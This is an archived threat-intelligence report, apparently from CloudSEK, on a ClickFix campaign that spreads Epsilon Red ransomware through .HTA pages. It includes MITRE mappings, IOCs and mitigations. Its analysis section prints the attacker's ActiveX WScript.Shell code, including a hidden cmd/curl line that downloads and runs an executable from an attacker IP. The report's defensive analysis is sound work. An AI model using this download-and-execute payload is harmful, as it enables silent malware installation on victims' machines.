{
	"id": "d67a2727-3cda-4050-88f8-6f6c11850b50",
	"created_at": "2026-04-06T02:10:47.56717Z",
	"updated_at": "2026-04-10T13:12:25.147256Z",
	"deleted_at": null,
	"sha1_hash": "a66bcaf07e11e7e0cae543134e1964a22d060389",
	"title": "Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 895957,
	"plain_text": "Threat Actors Lure Victims Into Downloading .HTA Files Using\r\nClickFix To Spread Epsilon Red Ransomware\r\nBy CloudSEK TRIAD\r\nPublished: 2025-07-25 · Archived: 2026-04-06 01:34:55 UTC\r\nExecutive Summary\r\nDuring routine infrastructure hunting, CloudSEK’s TRIAD uncovered a Clickfix-themed malware delivery site in\r\nactive development, associated with the Epsilon Red ransomware. Unlike previous campaigns that copy\r\ncommands to clipboards, this variant urges victims to visit a secondary page, where malicious shell commands are\r\nsilently executed via ActiveX to download and run payloads from an attacker-controlled IP. Social engineering\r\ntactics, such as fake verification codes, are used to appear benign. Pivoting into related infrastructure revealed\r\nimpersonation of services like Discord Captcha Bot, Kick, Twitch, and OnlyFans, as well as romance-themed\r\nlures. Epsilon Red was first observed in 2021 and is loosely inspired by REvil ransomware in ransom note\r\nstyling, but otherwise appears distinct in its tactics and infrastructure.\r\nAnalysis \r\nDuring our routine infrastructure hunting activity, we discovered a clickfix themed malware delivery page that\r\nwas under development.\r\nUsually, upon clicking the verification button, the malicious command gets copied to the victim’s clipboard.\r\nHowever, in this case, the victim was urged to open another page on the same website.\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 1 of 7\n\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 2 of 7\n\nvar shell = new ActiveXObject(\"WScript.Shell\");\r\nThis object allows execution of shell commands (cmd.exe).\r\nSilent Download and Execution\r\nshell.Run(\"cmd /c cd /D %userprofile% \u0026\u0026 curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe \u0026\u0026 a.exe\",\r\n0);\r\ncd /D %userprofile%: Switches to the user's home directory.\r\ncurl -s -o a.exe ...: Silently downloads a file from an IP and saves it as a.exe.\r\na.exe: Executes the downloaded file. [md5: 98107c01ecd8b7802582d404e007e493] - Epsilon Red\r\n0: Runs the process hidden (no window shown).\r\nDisplays a Fake Verification Message\r\nshell.Run(\"cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 \u0026\u0026 pause\");\r\nDisplays the social engineering message to conclude the clickfix bait theme.\r\nTypo (\"Verificatification\") may be intentional to appear non-threatening or amateurish.\r\npause: Keeps the CMD window open.\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 3 of 7\n\nUpon entering the right code shown in the command prompt, the following message appears on the dialog box.\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 4 of 7\n\nPivoting through their infrastructure, we noted that the threat actors are impersonating a popular discord captcha\r\nbot(https://captcha.bot), along with a variety of streaming services such as Kick, Twitch, Rumble, Onlyfans etc\r\ndelivering predominantly windows payloads using Clickfix. In addition, we were able to find a small cluster of\r\nromance/dating themed clickfix delivery pages operated by the same threat actor.\r\nAttribution\r\nEpsilon Red ransomware, first identified in 2021, leaves a ransom note on infected computers that bears a\r\nresemblance to the REvil ransomware note, albeit with minor grammatical improvements. Beyond this, no other\r\nclear similarities between Epsilon Red and REvil ransomware have been observed.\r\nMITRE Mapping\r\nTactic Technique ID Description\r\nInitial\r\nAccess\r\nPhishing: Drive-by\r\nCompromise\r\nT1189\r\nVictims are lured to themed websites (e.g., fake\r\nverification pages) where malicious scripts\r\nexecute without user interaction.\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 5 of 7\n\nTactic Technique ID Description\r\nExecution\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nT1059.003\r\nUses cmd.exe to execute downloaded binaries\r\nand display social engineering messages.\r\nExecution\r\nCommand and Scripting\r\nInterpreter:\r\nJavaScript/VBScript\r\nT1059.005\r\nMalicious JavaScript\r\n(ActiveXObject(\"WScript.Shell\")) embedded in\r\nweb pages executes commands on the host.\r\nExecution\r\nUser Execution: Malicious\r\nLink\r\nT1204.001\r\nVictims are socially engineered into clicking a\r\nmalicious link and following staged\r\ninstructions.\r\nDefense\r\nEvasion\r\nObfuscated Files or\r\nInformation\r\nT1027\r\nThe payload is delivered with minimal visibility\r\n(curl -s) and executed silently (Run(..., 0)).\r\nDefense\r\nEvasion\r\nMasquerading T1036\r\nUse of fake verification codes and benign\r\nthemes (e.g., captcha verification) to mislead\r\nusers and security analysts.\r\nPersistence\r\n(expected)\r\nScheduled Task/Job T1053.005\r\nEpsilon Red campaigns have historically used\r\nscheduled tasks for persistence post-execution.\r\nCommand\r\nand Control\r\nApplication Layer\r\nProtocol: Web Protocols\r\nT1071.001\r\nUses HTTP (via curl) for payload download and\r\npossibly for follow-up C2 traffic.\r\nImpact Data Encrypted for Impact T1486\r\nFinal-stage ransomware (Epsilon Red) encrypts\r\nvictim files after initial infection.\r\nIOCs\r\nIndicator Type Value Notes\r\nmd5 98107c01ecd8b7802582d404e007e493 Epsilon Red Ransomware\r\nDomain twtich[.]cc Clickfix Delivery [.hta]\r\nIP:Port 155.94.155[.]227:2269 Command and Control\r\nmd5 2db32339fa151276d5a40781bc8d5eaa Quasar RAT Malware\r\nDomain capchabot[.]cc Clickfix Delivery [regular]\r\nIP:Port 213.209.150[.]188:8112 Command and Control\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 6 of 7\n\nImpact\r\nEndpoint Compromise via Web Browsers: Abuse of ActiveXObject enables remote code execution\r\ndirectly from browser sessions, bypassing traditional download protections.\r\nRansomware Deployment: This can lead to a full-blown ransomware encryption preceded by  lateral\r\nmovement.\r\nBrand Impersonation Reduces User Suspicion: Mimicking Discord captcha services and streaming\r\nplatforms increases the likelihood of successful social engineering.\r\nPersistent Infrastructure Abuse: Reuse of themed delivery pages (Clickfix, romance lures) across\r\ncampaigns indicates long-term operational infrastructure and planning.\r\nMitigations\r\nDisable ActiveX and Windows Script Host (WSH): Enforce Group Policies to block legacy script\r\nexecution vectors (WScript.Shell, ActiveXObject) in all environments.\r\nThreat Feed Integration and IP Blocking: Proactively ingest threat intel to blacklist known attacker IPs\r\nand domains, as well as IOFAs(Indicators of Future Attack) tied to Clickfix campaigns.\r\nEndpoint Behavior Analytics: Deploy EDR rules to flag hidden executions (shell.Run, cmd /c, silent\r\ndownloads via curl) and suspicious child process creation from browsers.\r\nSecurity Awareness Training: Simulate attacks that impersonate familiar services (e.g., Discord bots,\r\nTwitch) to condition users against interacting with fake verification pages.\r\nReferences\r\n*Intelligence source and information reliability - Wikipedia\r\n#Traffic Light Protocol - Wikipedia\r\nhttps://news.sophos.com/en-us/2021/05/28/epsilonred/\r\nSource: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomwar\r\ne\r\nhttps://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware"
	],
	"report_names": [
		"threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775441447,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.pdf",
		"text": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.txt",
		"img": "https://archive.orkl.eu/a66bcaf07e11e7e0cae543134e1964a22d060389.jpg"
	}
}